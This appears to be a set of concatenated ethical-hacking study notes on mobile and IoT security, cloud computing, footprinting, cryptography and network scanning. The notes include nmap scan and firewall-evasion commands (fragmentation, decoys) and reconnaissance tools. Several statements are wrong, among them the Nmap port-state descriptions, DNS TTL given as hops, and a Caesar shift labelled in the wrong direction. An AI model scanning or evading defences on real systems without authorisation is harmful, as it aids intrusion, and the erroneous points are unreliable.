# Basic Threats
- Malware (Trojans, rootkits, ransomware, etc.)
- Data loss
- Data tampering

# OS Sandboxing Issue
- A sandbox is a security mechanism for separating running programs, usually in an effort to keep system failures or software vulnerabilities from spreading
- The sandbox limits the app's access to files, preferences, network resources, ...
- Advanced malware is designed to bypass it, by fragmenting code or putting a sleep timer in the script to bypass the inspection process

# Rooting
- A process of allowing the user to attain privileged control
- Needed to modify settings, get full control over the kernel or install custom ROMs

## iOS
**Jailbreaking**
- Rooting iOS
- Escalating privileges on iOS to remove or bypass the factory default restrictions

# Types of Jailbreaking
- **Userland Exploit** : allows user-level access without escalating to iBoot-level access
- **iBoot Exploit** : allows user-level and boot-level access
- **Bootrom Exploit** : allows user-level and boot-level access

# Jailbreaking Techniques
**Untethered Jailbreak**
- Does not require a reboot with a connection to your computer
- The exploit bypasses the iBoot sequence

**Tethered Jailbreak**
- Needs a connection to your computer to reboot; without it, the boot gets stuck on the Apple logo
- Offers complete jailbreak features

**Semi-Untethered Jailbreak**
- Allows booting the iOS device, but with limited functionality
- The jailbreak functions are disabled until a jailbreak app is launched

**Semi-Tethered Jailbreak**
- Allows you to boot with limited functionality
- To get the full functionality, a reboot with a tethered jailbreak is required
- Semi-Tethered Jailbreak: tethered jailbreak + a package that allows rebooting with limited functionality

# Windows Phone
- Windows Phone 8 uses the Windows NT kernel
- Windows Phone 8 includes app sandboxing, remote device management, native code support (C++)

# BlackBerry OS
- Support for Java Micro Edition MIDP 1.0 and MIDP 2.0
- OS updates with the BlackBerry over-the-air software loading service (OTASL)

# Bring Your Own Device (BYOD)
BYOD is the trend of employees using their personal devices for work. It could be a laptop, a phone, etc.

# BYOD Policies
BYOD policies should include:
- Device: which devices and operating systems are supported
- Password: require all devices to be password protected
- Access: determine which data can be accessed from an employee's device
- Application: which applications are allowed, which should be banned

# Mobile Security Guideline
- Avoid auto-upload of files
- Perform security assessments of applications
- Turn off Bluetooth - BlueBorne attack
- Allow only necessary GPS-enabled applications
- Do not connect to open networks
- Install applications from trusted sources
- Use strong passwords
- Use Mobile Device Management (MDM) software
- Update the operating system often
- Do not allow rooting / jailbreaking
- Encrypt phone storage
- Periodic backups
--------------------------------------------------------------------------------
/Module 18 - IOT Hacking/18_IoT_Hacking.md:
--------------------------------------------------------------------------------
## Basic
The Internet of Things (IoT) is the network of devices, vehicles, and home appliances that contain electronics, software, actuators, and connectivity which allow these things to connect, interact and exchange data.

IoT involves extending Internet connectivity beyond standard devices, such as desktops, laptops, smartphones and tablets, to any range of traditionally dumb or non-internet-enabled physical devices and everyday objects.

Embedded with technology, these devices can communicate and interact over the Internet, and they can be remotely monitored and controlled.

## Main Components
1. Sensors
2. Device
3. Gateway
4. Cloud

## IoT Architecture
1. **Perception Layer** : sensors that gather information about the environment (heat sensor, pressure sensor, blood pressure sensor, etc.)
2. **Transport Layer** : transfers the sensor data through the network (Wi-Fi, Bluetooth, ...)
3. **Processing Layer** : stores, processes, analyses data (cloud computing, big data, ...)
4. **Application Layer** : delivers application-specific services to the user

## IoT Technologies
- IoT uses IPv6 due to the limited number of IPv4 addresses

### Wireless Transmission Mechanism
- Bluetooth Low Energy (BLE) - BlueBorne ---> Class C (10 m)
- Wi-Fi ---> 30 m - 250 m
- Radio-Frequency Identification (RFID) - range 1-30 m --> Active RFID --- Passive RFID ---- Semi Active/Passive RFID tags
- Near-Field Communication (NFC) - range 10 cm
- LTE-Advanced : formally submitted as a candidate 4G, often being described as 3.9G (beyond 3G but pre-4G)
- Wi-Fi HaLow : uses 900 MHz to provide extended range and lower energy consumption - range of around **1 km**
- Low-Power Wide-Area Network (LPWAN) : designed to allow long-range communication at a low bit rate among things. Range around **10 km**
- Cellular - range from **8 km - 40 km**

### Wired Communication
- Ethernet
- Power-Line Communication (PLC) : using electrical wiring to carry power and data

### Operating System
- Linux on embedded systems
- Windows IoT
- RTOS - Real-time OS
- AWS IoT -

## IoT Communication Models
### Device-To-Device Model
- The devices communicate with each other without interfering with any other device
- Using a communication medium such as a wireless network

### Device-To-Cloud Model
- The IoT device communicates directly with the application server
- The application server provides information exchange between these devices

### Device-To-Gateway Model
- The gateway collects the data from the sensors, then sends it to the application server
- The gateway provides security or information and protocol translation

### Back-End Data-Sharing Model
- Uses a collective partnership between different application providers
- Access to the uploaded data is granted to third parties
- An extended Device-To-Cloud model

## Challenges to IoT
- Lack of security
- Vulnerable interfaces
- Physical security risk
- Lack of vendor support
- Difficulty of updating firmware and OS ->
- Interoperability issues

## OWASP Top Ten IoT (2014)
1. Insecure web interface
2. Insufficient authentication / authorization
3. Insecure network services
4. Lack of transport encryption / integrity verification
5. Privacy concerns
6. Insecure cloud interface
7. Insecure mobile interface
8. Insufficient security configurability
9. Insecure software / hardware
10. Poor physical security

## Common Attacks
- Device memory containing credentials
- Access control
- Firmware extraction
- Privilege escalation
- Resetting to an insecure state
- Removal of storage media
- Web attacks
- Firmware attack
- Network service attacks
- Unencrypted local data storage
- Confidentiality and integrity issues
- Cloud computing attacks
- Malicious updates -->
- Insecure APIs ---> login ---> OAuth --->
- Mobile application threats
- DoS / DDoS
- Rolling Code Attack: the attacker captures the signal from the transmitter device while simultaneously blocking the receiver from receiving it; later the captured signal is used to gain unauthorized access (e.g. steal a car with the captured signal)
- BlueBorne Attack: using different exploits to gain unauthorized access to the target device
- Jamming Attack: jamming the signal to prevent the communication of devices
- Backdoor (not just IoT related)
- Eavesdropping
- Man-in-the-middle attack
- Replay attack
- Forged malicious devices
- Ransomware attack

## Hacking Methodology

### Information Gathering
- IP address
- Running protocols
- Open ports
- Type of device
- Vendor
- [shodan](https://www.shodan.io/) is a helpful search engine for IoT

### Vulnerability Scanning
- Scanning the network and devices to find vulnerabilities
- Search for weak passwords
- Software and firmware vulnerabilities
- Tools: nmap, hping, ...
### Attack
- Exploiting vulnerabilities
- Tools: HackRF

### Gain Access
- Gain unauthorized access
- Privilege escalation
- Install backdoor

### Maintain Attack
- Logging out
- Clearing logs
- Covering tracks

## Countermeasures
- Firmware update
- Block unnecessary ports
- Disable telnet
- Use encrypted communication (SSL/TLS)
- Use strong passwords - passphrases
- Encrypt drives
- Periodic assessment of devices
- Secure password recovery
- Two-Factor Authentication -
- Disable UPnP
--------------------------------------------------------------------------------
/Module 19 - Cloud Computing/19_Cloud_Computing.md:
--------------------------------------------------------------------------------
# Basic
Cloud computing is shared pools of configurable computer system resources and higher-level services that can be rapidly provisioned with minimal management effort, often over the Internet. Third-party clouds enable organizations to focus on their core businesses instead of expending resources on computer infrastructure and maintenance. Advocates note that cloud computing allows companies to avoid or minimize up-front IT infrastructure costs. Proponents also claim that cloud computing allows enterprises to get their applications up and running faster, with improved manageability and less maintenance.
# Characteristics of Cloud Computing
- Increased user flexibility
- Cost reduction
- Device and location independence
- Distributed storage
- Automated management
- Virtualization
- Measured services

# Cloud Computing Service Models
**Infrastructure as a Service (IaaS)**
The capability provided to the consumer is to provision processing, storage, networks, and other fundamental computing resources where the consumer is able to deploy and run arbitrary software, which can include operating systems and applications. The consumer does not manage or control the underlying cloud infrastructure but has control over operating systems, storage, and deployed applications and possibly limited control of select networking components (e.g., host firewalls).
**Platform as a Service (PaaS)**
The capability provided to the consumer is to deploy onto the cloud infrastructure consumer-created or acquired applications created using programming languages, libraries, services, and tools supported by the provider. The consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, or storage, but has control over the deployed applications and possibly configuration settings for the application-hosting environment.
**Software as a Service (SaaS)**
The capability provided to the consumer is to use the provider's applications running on a cloud infrastructure. The applications are accessible from various client devices through either a thin client interface, such as a web browser (e.g., web-based email), or a program interface. The consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, storage, or even individual application capabilities, with the possible exception of limited user-specific application configuration settings.
# Cloud Computing Deployment Models
**Private Cloud**
The cloud infrastructure is provisioned for exclusive use by a single organization comprising multiple consumers (e.g., business units). It may be owned, managed, and operated by the organization, a third party, or some combination of them, and it may exist on or off premises.
**Public Cloud**
The cloud infrastructure is provisioned for open use by the general public. It may be owned, managed, and operated by a business, academic, or government organization, or some combination of them. It exists on the premises of the cloud provider.
**Hybrid Cloud**
The cloud infrastructure is a composition of two or more distinct cloud infrastructures (private, community, or public) that remain unique entities, but are bound together by standardized or proprietary technology that enables data and application portability (e.g., cloud bursting for load balancing between clouds).
**Community Cloud**
The cloud infrastructure is provisioned for exclusive use by a specific community of consumers from organizations that have shared concerns (e.g., mission, security requirements, policy, and compliance considerations). It may be owned, managed, and operated by one or more of the organizations in the community, a third party, or some combination of them, and it may exist on or off premises.

# Actors
**Cloud Consumer** : A person or organization that maintains a business relationship with, and uses services from, cloud providers.
**Cloud Provider** : A company or individual that delivers cloud computing based services and solutions to businesses and/or individuals.
**Cloud Auditor** : A party that can conduct an independent assessment of cloud services.
**Cloud Broker** : An entity that manages the use, performance and delivery of cloud services, and negotiates relationships between providers and consumers.
**Cloud Carrier** : An intermediary that provides connectivity and transport of cloud services from providers to consumers.

# Cloud Computing Threats
- Data loss / breach
- Virtualization-level attacks
- Service termination and failure
- Malicious insider
- Hardware failure
- Weak authentication
- Privilege escalation
- Loss of logs

# Cloud Computing Attacks
- Social engineering attacks (password guessing, ...)
- XSS attacks
- DNS attacks (DNS poisoning, domain hijacking, ...)
- SQL injection
- Network sniffing (obtaining credentials, cookies, ...)
- Session hijacking (cookie stealing, ...)
- Cryptanalysis (weak encryption, ...)
- DoS / DDoS

# Cloud Security
**Application Layer**
- Application firewall (filter and observe traffic)
- Secure Systems Development Life Cycle (SSDLC)
- Binary code analysis
- Script analysis
- Transactional security

**Network Layer**
- Next Generation IPS / IDS (NGIPS / NGIDS)
- Firewalls
- Anti-DDoS

**Information**
- Provide confidentiality and integrity
- Data Loss Prevention (DLP)

**Computer and Storage**
- Host-based IPS / IDS (HIDS/HIPS)
- Integrity checks
- File system monitoring
- Log file analysis
- Connection analysis
- Storage encryption

**Physical Security**
- Physical protection is a priority
- Protect against theft, unauthorized physical access, environmental impact (rain, earthquake, power failure, ...)
86 | 87 | # Responsibilities in Cloud Security 88 | **Cloud Service Provider** 89 | - Web Application Firewall (WAF) 90 | - Firewall 91 | - Data Loss Prevention (DLP) 92 | - Intrusion Prevention System (IPS) 93 | - Application Security (App Sec) 94 | - Virtual Private Network (VPN) 95 | - Load Balancer 96 | 97 | **Cloud Service Consumer** 98 | - Public Key Infrastructure (PKI) 99 | - Security System Development Life Cycle (SSDLC) 100 | - Firewall 101 | - Encryption 102 | - Intrusion Prevention System (IPS) 103 | - Application Security 104 | - Virtual Private Network (VPN) 105 | 106 | # Countermeasures and Security Considerations 107 | - Disaster Recovery Plan 108 | - Load Balancing 109 | - Data Integrity 110 | - Patching and updates 111 | - SSL/TLS 112 | - Cryptography implementation 113 | - Quality of Service (QoS) 114 | - Monitoring 115 | -------------------------------------------------------------------------------- /Module 2 :-: FootPrinting.md: -------------------------------------------------------------------------------- 1 | # Footprinting & Reconnaissance 2 | Collecting info regarding internal and external security architecture. Foot printing and Recon help attacker to reduce focus area and bring closer to the target. Collect information about a target network. 3 | - Active Footprinting : Collect info with Direct interaction 4 | - Passive Footprinting : Collect info without direct interaction 5 | Methods: 6 | Web App Footprinting 7 | - Public Emails - Email Addresses available on Webpages. 8 | - WHOIS - WHOIS give us info about Domain like when registered, expiry, owner, etc. 9 | - IP Geolocation - Geolocation of Server and Organization. 10 | - Wayback URLs - Analyse changes made in web app over time, collect all API endpoints, directories, comments from JS file and HTML files. Check Archive.org for this. 11 | - Technology - Check what different frameworks, languages, there versions are used in constructing web app. 
  Use tools such as Wappalyzer, BuiltWith, etc.
- Directory - perform a dictionary check on the web app for directories exposed by the application, using tools such as dirb, gobuster, etc.

DNS Footprinting
- A - server IPv4 address
- AAAA - server IPv6 address
- MX - mail server used for handling emails for that domain.
- TTL - Time to Live (after how many hops the packet will be discarded)
- CNAME - provides additional names or aliases for the address record

Social Engineering
- Eavesdropping - the process of intercepting unauthorized communication to gather information.
- Shoulder Surfing - secretly observing the target to gather sensitive information like passwords, personal identification information, account information, etc.
- Dumpster Diving - the process of collecting sensitive information by looking into the trash/bin.
--------------------------------------------------------------------------------------------------
# K1). User Recon Techniques
- UserRecon - (Tool) - https://github.com/issamelferkh/userrecon.git
  git clone https://github.com/issamelferkh/userrecon.git
  - This tool searches for a username on 75 different social media sites.
  - ./userrecon - enter the name
- sherlock - similar to UserRecon
  python3 sherlock
- theHarvester - theHarvester --source
- Job sites - (LinkedIn, Indeed, monster.com, etc.)
- Social Searcher
  - This website searches for a username on different social media platforms. The user search is not limited to 1 search per website.

----------------------------------------------------------------
# K2). Google Dorks & Google Hacking Database (GHDB)
- intitle : matches the given string against the page title. (intitle:Owasp top 10)
- intext : matches the given string against the page text. (intext:"How to become a Hacker")
- site : limits the search to a specific site only.
  (site:drive.google.com)
- inurl : matches the given string against the URL. (inurl:twitter.com)
- filetype : matches the file type of the search results. (filetype:pdf)
- Exploit DB https://Exploit-db.com/google-hacking-database

----------------------------------------------------------------
# K3). Domain Recon Technique
- website-informer - IP address, owner email, subdomains, DNS, registrar
- whois.domaintools.com - IP address, subdomains, DNS, registrar, other sites registered on the same server (if any).
- Shodan - Shodan is a device search engine. Shodan searches for devices accessible through the internet.
  - Search for devices running a given service
  - Search for devices connected to a given organization
  - Search for devices based on location
  - Search for exposed devices like cameras, printers, routers, IoT devices, TVs, etc.
- Builtwith.com / Wappalyzer
  - These websites tell us about the technology used to build a website, like Google Analytics, chatbots, programming languages, e-commerce technology, etc.
- DnsDumpster.com
  - Provides information about a domain name
- DnsTwister - https://dnstwister.report/
  - This website shows domains with similar names which are registered or available.
- Dirb - directory buster
- Sublist3r - identify subdomains

----------------------------------------------------------------
# K4). Tools that can be used for Footprinting
- Maltego - Maltego is a GUI-based tool which searches for all connections of a domain: its server, other websites, MX servers, and other domains connected to these mail servers or hosted on the same server.
- Gobuster - analyse application DNS, directories, GCP, etc.
- Burp Suite - GUI framework to perform all kinds of SAST/DAST scans on web apps, including information gathering.
----------------------------------------------------------------
# K5). Information collected
- Organization Information - phone numbers, employee details, email addresses, physical location, etc.
- Relation with other companies - other organizations the client works with.
- Network Information - different networks, running services, domains, mail server, etc.
- System Information - OS, architecture, etc.
--------------------------------------------------------------------------------
/Module 20 - Cryptography/20_Cryptography.md:
--------------------------------------------------------------------------------
## Terms -> module 1 -> module 20
- **Clear text / plaintext**: the unencrypted data
- **Cipher text**: the encrypted data
- **Key**: specifies the transformation of data for encryption / decryption ("key" is not synonymous with "password", although a password can in fact be used as a key)
- **Cipher**: an algorithm for performing encryption and decryption

# Symmetric cryptography
- Uses the same key for encryption and decryption
- Symmetric-key ciphers are either stream ciphers or block ciphers
- Popular algorithms: AES, DES

# Asymmetric / Public Key cryptography
- Two keys are used: public and private
- The public key is publicly known to everyone, issued by a Public Key Infrastructure (PKI), and used to encrypt the data
- The private key is kept secret from the public, known only by the owner, and used to decrypt the data
- Asymmetric cryptography delivers confidentiality, integrity, authenticity and non-repudiation
- Popular algorithms : RSA, DSA, Diffie-Hellman, ECDH
------------------------------------------------------------------------------------------------------
# Substitution Cipher
- Every character is substituted with another one
- More on [Wikipedia](https://en.wikipedia.org/wiki/Substitution_cipher)
- Example cipher : [Caesar cipher](https://en.wikipedia.org/wiki/Caesar_cipher)

Example:
```
Plaintext  : THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG
Ciphertext : QEB NRFZH YOLTK CLU GRJMP LSBO QEB IXWV ALD

Key : right shift of 3
```

# Transposition Cipher
- The positions held by units of plaintext are shifted according to a regular system
- Example cipher : [Rail Fence cipher](https://en.wikipedia.org/wiki/Rail_fence)

Example:
```
Clear text: WE ARE DISCOVERED. FLEE AT ONCE

W . . . E . . . C . . . R . . . L . . . T . . . E
. E . R . D . S . O . E . E . F . E . A . O . C .
. . A . . . I . . . V . . . D . . . E . . . N . .

Ciphertext: WECRLTEERDSOEEFEAOCAIVDEN
```

# Polyalphabetic Cipher
- Based on substitution
- Uses multiple substitution alphabets
- Example cipher : [Vigenère cipher](https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher)

# Stream Cipher
- Plaintext digits are combined with a pseudorandom cipher digit stream (keystream)
- Each plaintext digit is encrypted one at a time with the corresponding digit of the keystream
- Example ciphers: RC4, Salsa20, ChaCha20

# Block Cipher
- Operates on fixed-length groups of bits, called blocks, with an unvarying transformation that is specified by a symmetric key
- Example ciphers: AES, DES, 3DES, 2DES

# Symmetric Algorithms

# Data Encryption Standard (DES)
- Introduced in 1975
- Standardized in 1977 by NIST
- Problem with DES: short key length (56 bits) -> ASIC chips
- Now considered insecure
- Improved version: Triple DES (applies DES three times)
- Problem with Triple DES: slow, compute heavy

# Parameters
| Parameter | Value |
|:-----------------:|:--------:|
| Block size | 64 bits |
| Key size | 56 bits |
| No. of rounds | 16 |
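The Caesar and Rail Fence examples above, as an added worked example that is not part of these notes. Note that the mapping in the Caesar example (T to Q, H to E, E to B) moves every letter three places backwards in the alphabet, which is the same as a right shift of 23; the code checks both readings against the notes' ciphertext, and the rail-fence routines are general in the number of rails rather than fixed to the three-rail picture above. `crack_caesar` is a small addition of my own to show why a 26-key cipher gives no real secrecy: a single known word (a crib) is enough to recover the shift.

```python
"""Classical ciphers from the notes: Caesar (substitution) and Rail Fence
(transposition). Added example, not from the original notes."""
import string

ALPHABET = string.ascii_uppercase


def caesar(text: str, shift: int) -> str:
    """Shift every letter `shift` places to the right (negative = left).
    Input is upper-cased; non-letters such as spaces pass through unchanged."""
    out = []
    for ch in text.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def caesar_decrypt(text: str, shift: int) -> str:
    """Undo caesar(text, shift)."""
    return caesar(text, -shift)


def crack_caesar(cipher: str, crib: str):
    """Try all 26 shifts and return the one whose decryption contains `crib`.
    Returns None if no shift produces the crib."""
    for shift in range(26):
        if crib.upper() in caesar_decrypt(cipher, shift):
            return shift
    return None


def _rail_index(i: int, rails: int) -> int:
    """Row of the i-th letter in the zig-zag: 0,1,...,rails-1,...,1,0,1,..."""
    period = 2 * (rails - 1)
    pos = i % period
    return pos if pos < rails else period - pos


def rail_fence_encrypt(text: str, rails: int) -> str:
    """Write letters in a zig-zag over `rails` rows, then read row by row.
    Only letters are kept, matching the notes' example (spaces and punctuation dropped)."""
    letters = [c for c in text.upper() if c in ALPHABET]
    if rails < 2:
        return "".join(letters)          # one rail is the identity transposition
    rows = [[] for _ in range(rails)]
    for i, ch in enumerate(letters):
        rows[_rail_index(i, rails)].append(ch)
    return "".join("".join(r) for r in rows)


def rail_fence_decrypt(cipher: str, rails: int) -> str:
    """Recompute the zig-zag pattern for len(cipher) letters, cut the ciphertext
    into one slice per rail, then walk the pattern taking the next letter of each rail."""
    if rails < 2:
        return cipher
    pattern = [_rail_index(i, rails) for i in range(len(cipher))]
    counts = [pattern.count(r) for r in range(rails)]
    slices, start = [], 0
    for c in counts:
        slices.append(list(cipher[start:start + c]))
        start += c
    return "".join(slices[r].pop(0) for r in pattern)


if __name__ == "__main__":
    pt = "THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG"
    print(caesar(pt, -3))                                  # the notes' ciphertext
    print(crack_caesar(caesar(pt, -3), "QUICK"))           # 23, i.e. a left shift of 3
    print(rail_fence_encrypt("WE ARE DISCOVERED. FLEE AT ONCE", 3))
```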

# Advanced Encryption Standard (AES)
- First published in 1998-1999 - 2000
- Became a federal government standard in 2002
- First (and only) publicly accessible cipher approved by the NSA for top secret information

# Parameters
| Parameter | AES-128 value | AES-192 value | AES-256 value |
|:-----------------:|:------------------:|:-----------------:|:------------------:|
| Block size | 128 bits | 128 bits | 128 bits |
| Key size | 128 bits | 192 bits | 256 bits |
| No. of rounds | 10 | 12 | 14 |

# Modes of Operation
- Electronic Code Book (ECB)
- Cipher Block Chaining (CBC)
- Output Feedback Mode (OFB)
- Galois/Counter Mode (GCM)

# Hashing
Generating a unique alphanumeric string for a string of characters, a program, an application, a file, etc.
Avalanche Effect --> if you change a single binary bit, the hash value changes drastically. This is called the avalanche effect.
Collision -->
--------------------------------------------------------------------------------
/Module 3 :-: Network Scanning.md:
--------------------------------------------------------------------------------
## TCP vs UDP
- TCP and UDP (Transmission Control Protocol and User Datagram Protocol) are communication protocols that facilitate the exchange of messages (in the form of packets) between computer devices in a network. These protocols decide how a packet will reach its destination. (Port numbers go up to 65535.)
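The TCP flags, the 3-way handshake and the port states that Nmap reports, all covered in this module, as an added worked example that is not part of these notes: a simulated SYN probe against a simulated host, showing both sides' segments. `SimulatedHost`, `Segment` and the port table in the demo are constructed stand-ins; no packets are sent. The reply-to-state mapping follows RFC 793 and the rules Nmap's SYN scan applies: SYN+ACK back means open, RST back means closed, and no reply at all means something (typically a firewall) dropped the probe, which is the "filtered" state.

```python
"""Simulated SYN probe exchange (added example, not from the notes).

Everything here is a constructed model: SimulatedHost answers segments the way a
TCP stack does for an open or closed port, or stays silent for a filtered one.
"""
from dataclasses import dataclass, field

# TCP header flag bits (RFC 793).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
_FLAG_NAMES = (("SYN", SYN), ("ACK", ACK), ("RST", RST), ("FIN", FIN), ("PSH", PSH), ("URG", URG))


def flag_names(flags: int) -> str:
    """Render a flag bitmask as e.g. 'SYN+ACK' for the exchange log."""
    return "+".join(name for name, bit in _FLAG_NAMES if flags & bit) or "none"


@dataclass
class Segment:
    src_port: int
    dst_port: int
    flags: int
    seq: int = 0
    ack: int = 0


@dataclass
class SimulatedHost:
    """Constructed target. ports maps port -> 'open' | 'closed' | 'filtered';
    unlisted ports behave as closed (nothing listening, no firewall rule)."""
    ports: dict
    log: list = field(default_factory=list)

    def receive(self, seg: Segment):
        state = self.ports.get(seg.dst_port, "closed")
        self.log.append(f"<- {flag_names(seg.flags)} to port {seg.dst_port} ({state})")
        if state == "filtered":
            return None                                   # dropped by the firewall: silence
        if seg.flags & SYN and not seg.flags & ACK:       # handshake step 1 arrived
            if state == "open":
                return Segment(seg.dst_port, seg.src_port, SYN | ACK, seq=1000, ack=seg.seq + 1)
            return Segment(seg.dst_port, seg.src_port, RST | ACK, ack=seg.seq + 1)
        if seg.flags & ACK and state == "open":
            return None                                   # step 3: connection established, no reply needed
        return Segment(seg.dst_port, seg.src_port, RST)   # anything else is rejected


def classify_reply(reply) -> str:
    """Port state implied by the answer to a SYN probe."""
    if reply is None:
        return "filtered"
    if reply.flags & SYN and reply.flags & ACK:
        return "open"
    if reply.flags & RST:
        return "closed"
    return "unknown"


def syn_probe(host: SimulatedHost, port: int, src_port: int = 40000):
    """Send SYN; if SYN+ACK comes back, finish the handshake with ACK.
    Returns (state, exchange) where exchange lists (side, flags) in order."""
    exchange = [("client", flag_names(SYN))]
    reply = host.receive(Segment(src_port, port, SYN, seq=100))
    state = classify_reply(reply)
    if reply is not None:
        exchange.append(("server", flag_names(reply.flags)))
    if state == "open":
        host.receive(Segment(src_port, port, ACK, seq=101, ack=reply.seq + 1))
        exchange.append(("client", flag_names(ACK)))
    return state, exchange


def scan(host: SimulatedHost, ports) -> dict:
    """Probe each port once and collect the resulting states."""
    return {p: syn_probe(host, p)[0] for p in ports}


if __name__ == "__main__":
    target = SimulatedHost({22: "open", 23: "closed", 80: "open", 445: "filtered"})   # constructed
    for port, state in scan(target, [22, 23, 80, 445]).items():
        print(f"{port:5d} {state}")
    for line in target.log:
        print(line)
```

The three outcomes in `classify_reply` are the ones a defender sees reflected in firewall logs: a closed port produces an RST from the host itself, while a filtered port produces a dropped-packet log entry on the firewall and nothing on the host.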

| TCP | UDP |
|:---|:---|
| Connection-oriented protocol | Connectionless protocol |
| Provides error checking | No error checking mechanism |
| Guarantees delivery of data | No guarantee of data delivery |
| Slower and less efficient for fast transmission | Faster transmission |
| All packets follow the same path | Packets can follow any path to reach the destination |
| Automatic retransmission possible | Retransmission is not possible in case of packet loss |
---------------------------------------------------
## TCP Flags:
- SYN : the Synchronize flag is used to initiate the 3-way handshake between hosts.
- ACK : the Acknowledgment flag is used to acknowledge the successful receipt of a packet.
- FIN : the Finished flag means there is no more data from the sender. (e.g. 1 GB --> 50000 packets --> 1, 2, 3, 4, 5, 6, ........., 50000 (FIN))
- URG : the Urgent flag is used to notify the receiver to process the urgent packets before processing all other packets.
- PSH : the Push flag is somewhat similar to the URG flag and tells the receiver to process these packets as they are received instead of buffering them.
- RST : reset a connection
---------------------------------------------------
## TCP 3 Way Handshake:
| Client | Direction | Server |
|:-------------:|:-------------:|:---------:|
| SYN | ----> | |
| | <---- | SYN+ACK |
| ACK | ----> | |

## OSI Model
| Layer | Name | Description | Example protocols |
|:-----:|:------------------:|:----------------------------------------------:|:--------------------:|
| 7 | Application layer | Human-computer interaction layer | HTTP, SNMP |
| 6 | Presentation layer | Ensures data is in a usable format | MIME, ASCII |
| 5 | Session layer | Maintains connections and controls ports and sessions | SOCKS, NetBIOS |
| 4 | Transport layer | Data transmission by TCP or UDP | TCP, UDP |
| 3 | Network layer | Decides the physical path for transmission | IP, ICMP |
| 2 | Data link layer | Reads the MAC address from the data packet | MAC, ARP |
| 1 | Physical layer | Physical connection | Ethernet, Wi-Fi |

## TCP/IP Model
| Layer | Name | Example protocols |
|:-----:|:------------------:|:-----------------:|
| 4 | Application layer | HTTP, SNMP |
| 3 | Transport layer | TCP, UDP |
| 2 | Internet layer | IP, ICMP |
| 1 | Link layer | ARP, MAC |
---------------------------------------------------------------------------------------------------------------
# Practical Part
------------------
## Main Objectives
k1. Scan live hosts
k2. Open ports and running services
k3. OS and architecture info
k4. Security implemented (Firewall, IDS, IPS) detection and evasion

## k1. Live hosts
`arp-scan --local`
`nmap -sn <ip/cidr>`              -sn specifies a no-port ping scan
`ping <target>`
`netdiscover -r <ip/cidr>`
--------------------------------------------------------------------------
## Nmap Port Scan Status
Open - If no response is received by Nmap, it means the port is open for connection.
Closed - If a response is received by Nmap with the RST or SYN flag, it means the port is closed.
Filtered - Probably some kind of firewall is implemented on the client side.
Open/Filtered - Nmap cannot tell whether the port is open or filtered.
Closed/Filtered - Nmap cannot tell whether the port is closed or filtered.
--------------------------------------------------------------------------
## k2. Open Ports and Running Services Scan
Nmap
`nmap <target>`                   Simple port scan
`nmap -v <target>`                Port scan with increased verbosity (-vv is more powerful)
`nmap <host1> <host2> ...`        Scan multiple hosts in a single go
`nmap <1.1.1.2-200>`              Scan an IP range from 2 to 200
`nmap <ip>/<cidr>`                Scan an entire subnet
`nmap -p 1-65535 <target>`        -p specifies the port numbers to scan
`nmap -p U:<ports>,T:<ports> <target>`   Scan the specified UDP and TCP ports. Use "" for all.
`nmap -sU <target>`               Scan the 1000 most common UDP ports
`nmap -T<0-5> <target>`           -T sets the scan intensity (timing): 5 is fastest and 0 is slowest. The default is 3 (-T3).
`nmap -sT <target>`               TCP connect scan
`nmap -iL list.txt`               Scan the IPs written in list.txt (separate IPs by space, tab or new line). `--excludefile list.txt` excludes the IPs in the file from the scan.
`nmap -A <target>`                Aggressive scan (uses the -O -sC --traceroute -sV options)
`nmap -O <target>`                -O is used for OS detection
`nmap -sC <target>`               -sC runs the default NSE scripts (see also --script)
`nmap -sV <target>`               -sV is used for service version detection
`nmap -6 <target>`                IPv6 scan
`nmap -sS <target>`               SYN scan/ping. Helpful where ICMP pings are blocked.
`nmap -sA <target>`               ACK scan/ping. Helpful where ICMP pings are blocked.
`nmap -sN <target>`               Null scan
`nmap --scanflags SYNACKFIN <target>`   Flags can be set manually with the --scanflags option.
`nmap -Pn <target>`               Don't ping (when a firewall blocks ping packets)
`nmap -sR <target>`               Scan for RPC (Remote Procedure Call) services
Hping3
`hping3 --icmp --verbose <target>`     Ping scan in verbose mode
`hping3 --scan <ports> <target>`       Scan for open ports on an IP (--ack, --syn, --fin, --urg)
`hping3 --udp --verbose <target>`      UDP port scan in verbose mode

--------------------------------------------------------------------------
## k3. Security Implemented (Firewall, IDS, IPS) Detection and evasion
`nmap -f <target>`                -f fragments packets into 8-byte fragments. Helpful when attempting to evade some older or improperly configured firewalls. The fragment size can also be set with the --mtu option; the size must be a multiple of 8.
`nmap -D RND:<number> <target>`   The -D decoy option masks an Nmap scan by using one or more decoys. Decoys are used to hide the scanner's identity. RND:<number> is the number of random decoy addresses to use. Addresses can also be specified explicitly, as `nmap -D decoy1,decoy2,decoy3,...`.
`nmap -sX <target>`               Nmap Xmas scan (if a firewall is enabled you get "all 1000 ports are closed/filtered"; if the firewall is disabled you get "closed"). The Xmas scan sets the PSH+URG+FIN flags (or all flags) on its packets, which creates an abnormal situation for the client; the client either responds with the RST flag or with some other relevant information.
--------------------------------------------------------------------------
## We can also use Zenmap
--------------------------------------------------------------------------
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
[![YouTube Playlist](https://img.shields.io/badge/YouTube-Playlist-red?logo=youtube)](https://www.youtube.com/playlist?list=PL--2vyReuUpTTg9cpFheJXJ2ySFfaHduq)

--> Playlist content will keep updating; it contains or will contain topics related to
1. Cryptography --> Done
2. Lab Setup + Network and OS Fundamentals --> Done
3. System Security --> Basics Done --> Higher level topics will be added with Labs
4. Network Security --> To Be Released
5. Web Application Security --> To Be Released
6. Android Application Security --> To Be Released
7. Cloud Fundamentals --> To Be Released
8. Cloud Security --> To Be Released

**📺 Fundamentals**

| **Understanding CIA Triad (Confidentiality, Integrity, Availability)** | **Common Security Standards** |
|----------------------------------|-----------------------------------------------|
